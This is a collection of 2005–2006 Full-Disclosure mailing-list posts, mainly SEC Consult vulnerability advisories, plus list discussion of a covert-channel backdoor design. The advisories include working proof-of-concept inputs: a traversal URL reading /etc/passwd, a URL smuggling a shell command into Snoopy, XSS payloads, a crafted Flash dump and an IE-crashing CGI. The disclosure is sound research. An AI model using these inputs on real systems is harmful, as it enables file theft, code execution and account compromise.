else { print failed.\n; } close($sock); vendor status: --- vendor notified: 2005-09-13 vendor response: 2005-09-13 patch available: 2005-12 General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF SEC Consult / @2006 research at sec-consult dot com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phun! Search
Hello, n3td3v wrote: I have exploit code for this issue, which the list won't be getting hold of. The disclosure was to show that I can ask the slurp robot to cache an account on the public index,... bla,... There's no need at all to cache anything at all. http://mtf.news.yahoo.com/mailto?prop=mycstorelocale=ush2=n3td3v will give you the same result as http://66.218.69.11/search/cache?ei=UTF-8p=n3td3vfr=sfpu=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.comw=n3td3vd=U5wy1m1aMbOeicp=1.intl=us (your Concept). Sorry to tell you, but there is no vulnerability involved here (except maybe a lame XSS, didn't try that though). -- Bernhard ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phun! Search
Hmm,.. No, I can't figure out how this works. You must have used zero day exploit code. n3td3v wrote: The document is cached on Yahoo Slurp, you explain that, smart guy ;-) On 3/23/06, *Bernhard Mueller* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Hello, There's no need at all to cache anything at all. Sorry to tell you, but there is no vulnerability involved here -- Bernhard ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
Hello, The ImpersonateClient API does not require that credentials are embedded into the program. A call to ImpersonateClient allow a server to impersonate the client when it receives a local connection, e.g. via a named pipe. It is mostly used by servers to DROP their privileges to that of the connecting user if they are running with administrative privileges. A security issue with ImpersonateClient arises if there's no error checking on the ImpersonateClient call and the process runs without realizing that it is still SYSTEM. Another issue would be an unprivileged client with the ImpersonateClient privilege, if an attacker manages to make a process with admin rights connect to that client. This is why normal users do not have this right by default. Regards, Bernhard Paul Schmehl wrote: --On Wednesday, January 18, 2006 17:07:23 -0600 Frank Knobbe [EMAIL PROTECTED] wrote: On Wed, 2006-01-18 at 16:16 -0600, Paul Schmehl wrote: This means that the exposure, when granting the privilege, is as follows: 1) If you can launch a process on the local machine AND 2) The process has embedded credentials that are different from the user launching the process THEN 3) The user gains those credentials' privileges ***for the length of that process*** Yup. So if your use has that right, any spyware the user downloads via IE can use that user right to elevate credentials **for the length of the malware installation**. Does that sound right? And does that sound like something you'd want to happen? The spyware has to bring the credentials with it. The user doesn't *have* the credentials. It *gets* them from the process in question. That's a bit different. The user has the right to impersonate within the context of a process. The process must already have the credentials to elevate, or the user gets nothing (if I'm understanding impersonation correctly.) If you give that right, or admin privs, why don't you limit that only to the duration of the software install? It sounded like you were planning on granting that user right and leaving it in place. If you only grant it temporarily, the exposure is not great, imho. (Remember, I've been liberated from Windows for a couple years now ;) Do you know a way to programmatically grant rights, on the fly, and then take them away? I know you can do this with RunAs, but that would require having an admin password, in the clear, and readable by Authenticated Users. That ain't gonna happen. As far as granting the privilege goes, *if* we do it, it will only be in place long enough to distribute the agents. Then it will be removed. But I'm reluctant to even do *that* until I'm certain I fully understand the ramifications. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-XXXXXXXXXXX
I just totally mixed up these numbers. Should be SA-20051202-0 and SA-20051202-1, in the doubtful case that anyone cares. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Webmin miniserv.pl format string vulnerability
As it says on http://www.dyadsecurity.com/s_advisory.html: PUBLISHED ADVISORIES. Webmin Date Found: September 23, 2005. Public Release: November 29, 2005. Application:webmin miniserv.pl, all known versions Details:Webmin 0001 Advisory UPCOMING ADVISORIES. Perl Description:Cross platform programming language. Affected: To be announced. Release Date: To be announced. I guess we can expect some kind of code execution thru perl sprintf advisory. [EMAIL PROTECTED] wrote: SUMMARY. The webmin `miniserv.pl' web server component is vulnerable to a new class of exploitable (remote code) perl format string vulnerabilities. During the login process it is possible to trigger this (...) A generic remote code execution exploit method has been developed by a third party that is reachable though this hole itself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Forwarding comments to FD
This comment is based on ongoing conversations with Yahoo on w*l security. Sorry, I'm not entitled to post any details at this time, so please take it as my personal opinion and trust me that I have good reasons for it. You may also refer to our advisory from october (http://www.sec-consult.com/212.html). Regards, Bernhard [EMAIL PROTECTED] wrote: is your comment based on some personal experience, or just an attempt at humor? it is contrary to my experience. On Sun, Nov 20, 2005 at 12:57:24AM +0100, Bernhard Mueller wrote: n3td3v wr04t3: I have been a continued provider of raw intelligence to Yahoo... This probably explains why Yahoo has zero clue about security :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Forwarding comments to FD
n3td3v wr04t3: I have been a continued provider of raw intelligence to Yahoo... This probably explains why Yahoo has zero clue about security :) -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20051107-0 :: toendaCMS multiple vulnerabilites
SEC-CONSULT Security Advisory 20051107-0 = title: toendaCMS multiple vulnerabilites program: toendaCMS vulnerable version: 0.6.2 homepage: www.toenda.com found: 2005-10-25 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com = Vendor description: --- The toendaCMS Content Management and Weblogging tool gives you a modern, professional publishing system, based on an SQL and/or XML database. Vulnerabilty overview: --- toendaCMS contains various security flaws. These include: * theft of CMS usernames and passwords (XML database mode) * session theft (XML database mode) * directory traversal / reading of arbitrary files (XML database mode) * arbitrary file uploads Vulnerability details: --- 1) Account data is stored within the webroot (XML mode): http://tcms.webserver.com/data/tcms_user/random-val.xml, where random val is string composed of 5 bytes (e.g. 2ac336ff0d.xml). Each XML file contains username (base64) and password (MD5) of a single user. This is particularly dangerous if the webserver allows directory listing. 2) Session data is stored within the webroot: http://tcms.webserver.com/engine/admin/user-id.xml (XML mode). The session files are created once a user logs in to the CMS, so we just have to monitor this directory to steal his credentials. This is particularly dangerous if the webserver allows directory listing. 3) Directory Traversal / reading of arbitrary files (XML mode): http://tcms.webserver.com/engine/admin/admin.php?id_user= ../../../../../../etc/passwd 4) Arbitrary file uploads: Once we have gained access to the administrator interface, we can use the gallery scripts to upload arbitrary files to: http://tcms.webserver.com/data/images/albums/ No content-type or file validation checks are in place, so this is the easiest way to get shell access. Additional Remarks: --- These flaws were found during a pentest, in an environment with MAGIC_QUOTES_GPC activated. Please do NOT try to use toendaCMS without MAGIC_QUOTES and other safeguards, unless you plan to run a honeypot or have another particular reason for being very vulnerable. Vendor status: --- vendor notified: 2005-10-26 vendor response: 2005-10-30 patch available: 2005-11-01 The issues described in this advisory have been addressed in the latest version of toendaCMS (0.6.2 stable). Download at: http://www.toenda.com/de/data/files/Software/toendaCMS_Version_0.6.0_Stable/toendaCMS_0.6.2_Stable.zip General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2005 bmu at sec-consult dot com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption
SEC-CONSULT Security Advisory 20051107-1 === title: Macromedia Flash Player ActionDefineFunction Memory Corruption program: Macromedia Flash Plugin vulnerable version: flash.ocx v7.0.19.0 and earlier libflashplayer.so before 7.0.25.0 homepage: www.macromedia.com found: 2005-06-27 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com === Vendor description: --- Macromedia Flash Player is the high performance, lightweight, highly expressive client runtime that delivers powerful and consistent user experiences across major operating systems, browsers, mobile phones and devices. Vulnerabilty: --- ActionScript is an ECMAScript-based programming language used for controlling Macromedia Flash movies and applications. In SWF files, Actionscript commands are represented by DoAction Tags embedded in frames. SEC Consult has found that parameters to ActionDefineFunction (ACTIONRECORD 0x9b) are not properly sanitized. Loading a specially crafted SWF leads to an improper memory access condition which can be used to crash flash player or may be exploited as a vector for code execution. This issue is similar to CAN-2005-2628 (as reported by eEye Digital Security on November 4, 2005) but affects a different function. Coincidentally, Macromedia has received our notification of this bug on the same day (June 27). Proof of Concept: --- A malicious flash movie dump: swf - [SetBackgroundColor] - TagID: 9 (size: 3 (short tag) - dump -: \x43\x02\xff\x00\x00 - [DoAction] - TagID: 12 (size: 60 (short tag) - dump -: \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00 \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43 \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45 \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00 - [ShowFrame] - TagID: 1 (size: 0 (short tag) - dump -: \x40\x00 - [End] - TagID: 0 (size: 0 (short tag) - dump -: \x00\x00 /swf Recommended Fix: --- The issue has been addressed in MPSB05-07. Upgrade to the newest version of Flash Player 7 or to Flash Player 8. Link: http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html. Vendor status: --- vendor notified: 2005-06 fixed: 2005-09 General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2005 bmu at sec-consult dot com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC-Consult SA 20051025-0 :: Snoopy Remote Code Execution Vulnerability
SEC-CONSULT Security Advisory 20051025-0 == title: Snoopy Remote Code Execution Vulnerability program: Snoopy PHP Webclient vulnerable version: 1.2 and earlier homepage: http://snoopy.sourceforge.net found: 2005-10-10 by: D. Fabian / SEC-CONSULT / www.sec-consult.com == vendor description: --- Snoopy is a PHP class that simulates a web browser. It automates the task of retrieving web page content and posting forms, for example. Snoopy is used by various RSS parser, which are in turn used in a whole bunch of applications like weblogs, content management systems, and many more. vulnerabilty overview: --- Whenever an SSL protected webpage is requested with one of the many Snoopy API calls, it calls the function _httpsrequest which takes the URL as argument. This function in turn calls the PHP-function exec with unchecked user-input. Using a specially crafted URL, an attacker can supply arbitrary commands that are executed on the web server with priviledges of the web user. While the vulnerability can not be exploited using the Snoopy class file itself, there may exist implementations which hand unchecked URLs from users to snoopy. proof of concept: --- Consider the following code on a webserver: --- code --- ? include Snoopy.class.php; $snoopy = new Snoopy; $snoopy-fetch($_GET['url']); echo PRE\n; print $snoopy-results; echo /PRE\n; ? --- /code --- Requesting this code with a manipulated URL results in execution of arbitrary code (in this case echo 'hello' test.txt). Please consider the following url one line: http://server/fetch.php?url=https://www.%22;+echo+'hello'+%3E+ test.txt vulnerable versions: --- It seems that version 1.2 as well as some prior versions are vulnerable to the attack described above. recommended fix: --- Update to Snoopy version 1.2.1. vendor status: --- vendor notified: 2005-10-24 vendor response: 2005-10-24 patch available: 2005-10-24 ~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF Daniel Fabian / @2005 d.fabian at sec-consult dot com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC-CONSULT-SA-20051021-0: Yahoo/MSIE XSS
SEC-CONSULT Security Advisory 20051021-0 === title: Yahoo/MSIE XSS program: Yahoo Webmail in combination with MSIE 6.0 (maybe other browsers) homepage: www.yahoo.com found: 2005-04 by: SEC-Team / SEC-CONSULT / www.sec-consult.com === Vulnerabilty overview: --- Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within Yahoo's webmail systems. All of them have been fixed in the production environment. Nevertheless SEC-Consult believes that input-validation thru blacklists can just be a temporary solution to problems like this. From our point of view there are many other applications vulnerable to this special type of problem where vulnerabilities of clients and servers can be combined. Vulnerabilty details: --- 1) XSS / Cookie-Theft Yahoos blacklists fail to detect script-tags in combination with special characters like NULL-Bytes and other META-Characters. This leaves Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan / Phishing attacks. 2) Some XSS Examples from our advisories Excerpt from HTML-mails: SCRIPT-TAG: ---cut here--- h1hello/h1s[META-Char]criptalert(i have you now)/s[META-Char]cript/brrrxbr ---cut here--- OBJECT-TAG: ---cut here--- objec[META-Char]t classid=CLSID:D27CDB6E-AE6D-11cf-96B8-44455354 param name=movie value=http://[somewhere]/yahoo.swf;/obje[META-Char]ct ---cut here--- ONERROR-Attribute: ---cut here--- img src=http://dontexist.info/x.jpg; one[META-Char]rror=alert('i have you now')uargg/p ---cut here--- ONUNLOAD-Attribute: ---cut here--- /bodybody onun[META-Char]load=alert('i have you now')br/brpsomewords/p/body/html ---cut here--- Recommended hotfixes for webmail-users --- Do not use MS Internet-Explorer. Recommended fixes --- Do not use blacklists on tags and attributes. Whitelist special/meta-characters. Vendor status: --- Vulnerabilities have been fixed. General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~ SEC-Team / www.sec-consult.com / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?
if you have system access, why not capture packets at kernel level, BEFORE they reach the firewall. your approach seems to be very noisy ;) PASTOR ADRIAN wrote: Sometime ago I thought of the following idea for a covert channel.it would be better to intercept packets at kernel level BEFORE they Although the idea of covert channels is *not* new at all, I couldn't find anything in Google related to the following method of implementing a covert channel. The scenario is the following. The victim is a host with a host-level firewall which is blocking *all* incoming traffic. Somehow the attacker still needs to communicate with a backdoor planted in this host. Use a reverse shell and job done, you might say. Actually, there is another way which I thought would be more creative (IMHO). It works like this: the backdoor enables logging in the host-level firewall for all dropped packets, say Windows XP SP2 Firewall. Then the backdoor receives commands from the attacker by interpreting the properties of the dropped packets which were logged by the firewall. In other words, the backdoor is constantly reading the logs and parsing commands which were sent by the attacker embedded in packets which are being dropped (but logged) by the firewall. attacker sends packets - packets are dropped by firewall - packets properties are captured in logs - backdoor reads logs and finds encoded commands - commands are executed Now, for the way the backdoor would reply back to the victim is really up to you. One method that comes to my mind is by posting the responses to a PHP script which is located in some free-hosting webpage. The attacker would then access this webpage. Please, if you know anything related to backdoors intercepting commands from log files send me some links. Ideas, comments and flames are more than welcome :-) . Regards, pagvac (Adrian Pastor) Earth, SOLAR SYSTEM www.adrianpv.com http://www.adrianpv.com www.ikwt.com http://www.ikwt.com (In Knowledge We Trust) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- _ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Consult Unternehmensberatung GmbH ~ www.sec-consult.com ~ A-1080 Wien Blindengasse 3 ~ Tel: +43/676/840301718 ~ Fax: +43/(0)1/4090307-590 __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
[EMAIL PROTECTED] wrote: On Tue, 27 Sep 2005 17:53:58 +0200, Bernhard Mueller said: And note also that finding a hole and be talented enough to create an exploit are *totally* distinct. I found a rather nasty rootable hole in Sendmail a while back (read the release notes for 8.10.1 and the relevant manpages for the system linker - that gives enough info to figure out what the bug was). Never did create a working exploit for it - I fooled with it for an afternoon and only got as far as proving that if somebody were to spend more than an afternoon on it, they *could* produce a working exploit. i agree with this. it's often much easier to find a bug than to exploit it (see strange heap overflows and the like), and i also don't have the time to spend days on disassembling and looking for attack vectors (and i'm sure that other people will have more fun doing just that). what i criticize is that *lots* of companies (at least here in my vicinity) are selling cheap vulnerability assessments which actually are nothing more than automated security scans. this leads to the customer feeling safe when he's really wide open to attacks. often, these people's networks can be rooted in no time. sure, you don't have to be uber-31337 to do penetration tests (i'm certainly not), but it should definitely go beyond the scan--+--google-for-exploit approach. regards, -- _ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Consult Unternehmensberatung GmbH ~ www.sec-consult.com ~ A-1080 Wien Blindengasse 3 ~ Tel: +43/676/840301718 ~ Fax: +43/(0)1/4090307-590 __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
Exibar wrote: I didn't mean to imply that the consultants create their own exploits, not many I know could even begin to do that, only a couple are talented enough to do just that. Even for those very few, it's just not feasable from a time perspective. Much quick and cost effective to use what's out there. so what use is a pentest if the consultant isn't even talented enough to find / create exploits for unknown vulnerabilities? any average admin can install and run an automatic security scanner. furthermore, a common nessus report contains 99% useless garbage. and most of the time, you can not apply generic exploits like these from metasploit to a specific customer situation. in my experience, nearly all sites have some serious security flaws even if tools like nessus say the contrary. there may be self-coded applications or software that is not widely known or tested so they're not found in any vulnerability database. or, if that is not the case, you may even find new flaws in well-established software. IMHO you can not deliver a reasonable security assessment until you have checked everything by hand. regards, -- _ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Consult Unternehmensberatung GmbH ~ www.sec-consult.com ~ A-1080 Wien Blindengasse 3 ~ Tel: +43/676/840301718 ~ Fax: +43/(0)1/4090307-590 __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PowerDVD = 4.0 local exploit
edward GAGNON wrote: int main(int argc, char *argv[]) { char cmd[500]; [...] path = argv[1]; sprintf(cmd, %s , path); classical stack overflow ;) -- _ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Consult Unternehmensberatung GmbH ~ www.sec-consult.com ~ A-1080 Wien Blindengasse 3 ~ Tel: +43/676/840301718 ~ Fax: +43/(0)1/4090307-590 __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compromising pictures of Microsoft Internet Explorer!
Mr. Zalewski's statement about the undue burden that Microsoft's investigative processes place on the researcher is indeed accurate. The only time I've had any success working with Microsoft was when the issue was a straightforward code execution scenario. Oh wait... even then, I'm blown off. the same here... when I mailed them about that COM-vulnerability in IE, they came up with this is not exploitable, bla.. after two weeks of internal research and all. having a bad morning anyway, I decided to post the advisory and see, one day later there's a MS security advisory that a COM object may crash internet explorer (however, they forgot to mention the public bindshell exploit released by the fsirt). now recently MS05-37 came out, which somehow doesn't include any credits or mention of the original advisory whatsoever (the reason for that being, i presume, the lack of responsibility showed by us). I think it's rather strange to hear a billion-dollar software monopolist apply to my conscience like look what you've done, you put our customers at risk. they wouldn't give a lame cent on the security of their customers if there wasn't a certain media hype about security. they care for their image and stock index, and that's about it. and i don't see why should be held responsible for that ;) regards, sk0L -- _ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Consult Unternehmensberatung GmbH ~ www.sec-consult.com ~ A-1080 Wien Blindengasse 3 ~ Tel: +43/676/840301718 ~ Fax: +43/(0)1/4090307-590 __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC-CONSULT SA-20050629-0
SEC-CONSULT Security Advisory 20050629-0 == title: IE6 javaprxy.dll COM instantiation heap corruption vulnerability program: Internet Explorer vulnerable version: 6.0.2900.2180 homepage: www.microsoft.com found: 2005-06-17 by: sk0L Martin Eiszner / SEC-CONSULT / www.sec-consult.com == background: --- Internet Explorer supports instantiation of non-ActiveX controls, e.g COM objects, via object tags. according to M$, COM components respond gracefully to attempts to treat them as non-ActiveX controls. on the contrary, we found that at least 20 of the objects available on an average XP system either lead to an instant crash or an exception after a few reloads. vulnerability overview: --- Loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. in one case, we could leverage this bug to overwrite a function pointer in the data segment. it *may* be possible to exploit this issue to execute arbitrary code in the context of IE. proof of concept: --- this simple CGI should crash IE. --- #!/usr/bin/perl # in order for this to work javaprxy.dll must be available on the client. my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll my $html1 = htmlbody\nobject classid=\CLSID:.$clsid.\/object\n; my $html2 = \n/bodyscriptlocation.reload();/script/html\n; print Content-Type: text/html;\r\n\r\n; print $html1.(Ax3).$html2; --- on our lab machine, we, end up with eax=00410041, and an exception occurs at the following location in javaprxy.dll: --- .text:7C508660 mov eax, [ecx] .text:7C508662 testeax, eax .text:7C508664 jz short locret_7C50866C .text:7C508666 mov ecx, [eax] .text:7C508668 pusheax .text:7C508669 calldword ptr [ecx+8] --- as you can see, this situation may be exploitable, considering that we have some level of control over eax. vulnerable versions: --- javaprxy.dll 5.00.3810 internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 these are the versions tested, other versions may of course be vulnerable. vendor status: --- vendor notified: 2005-06-17 vendor response: 2005-06-17 patch available: ? microsoft does not confirm the vulnerability, as their product team can not reproduce condition. however, they are looking at making changes to handle COM objects in a more robust manner in the future. ~ Bernhard Müller / Martin Eiszner / www.sec-consult.com / SGT ::: walter|bruder, flo, tke, dfa ::: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/